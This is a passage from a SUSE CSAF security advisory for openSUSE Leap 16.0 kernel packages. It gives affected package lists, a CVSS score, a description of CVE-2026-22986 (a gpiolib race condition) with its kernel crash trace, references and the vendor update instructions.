"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22986",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22986"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpiolib: fix race condition for gdev-\u003esrcu\n\nIf two drivers were calling gpiochip_add_data_with_key(), one may be\ntraversing the srcu-protected list in gpio_name_to_desc(), meanwhile\nother has just added its gdev in gpiodev_add_to_list_unlocked().\nThis creates a non-mutexed and non-protected timeframe, when one\ninstance is dereferencing and using \u0026gdev-\u003esrcu, before the other\nhas initialized it, resulting in crash:\n\n[ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000\n[ 4.943396] Mem abort info:\n[ 4.943400] ESR = 0x0000000096000005\n[ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 4.943407] SET = 0, FnV = 0\n[ 4.943410] EA = 0, S1PTW = 0\n[ 4.943413] FSC = 0x05: level 1 translation fault\n[ 4.943416] Data abort info:\n[ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000\n[ 4.961449] [ffff800272bcc000] pgd=0000000000000000\n[ 4.969203] , p4d=1000000039739003\n[ 4.979730] , pud=0000000000000000\n[ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node \"reset\"\n[ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n...\n[ 5.121359] pc : __srcu_read_lock+0x44/0x98\n[ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0\n[ 5.153671] sp : ffff8000833bb430\n[ 5.298440]\n[ 5.298443] Call trace:\n[ 5.298445] __srcu_read_lock+0x44/0x98\n[ 5.309484] gpio_name_to_desc+0x60/0x1a0\n[ 5.320692] gpiochip_add_data_with_key+0x488/0xf00\n 5.946419] ---[ end trace 0000000000000000 ]---\n\nMove initialization code for gdev fields before it is added to\ngpio_devices, with adjacent initialization code.\nAdjust goto statements to reflect modified order of operations\n\n[Bartosz: fixed a build issue, removed stray newline]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22986",
"url": "https://www.suse.com/security/cve/CVE-2026-22986"
},
{
"category": "external",
"summary": "SUSE Bug 1257276 for CVE-2026-22986",
"url": "https://bugzilla.suse.com/1257276"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
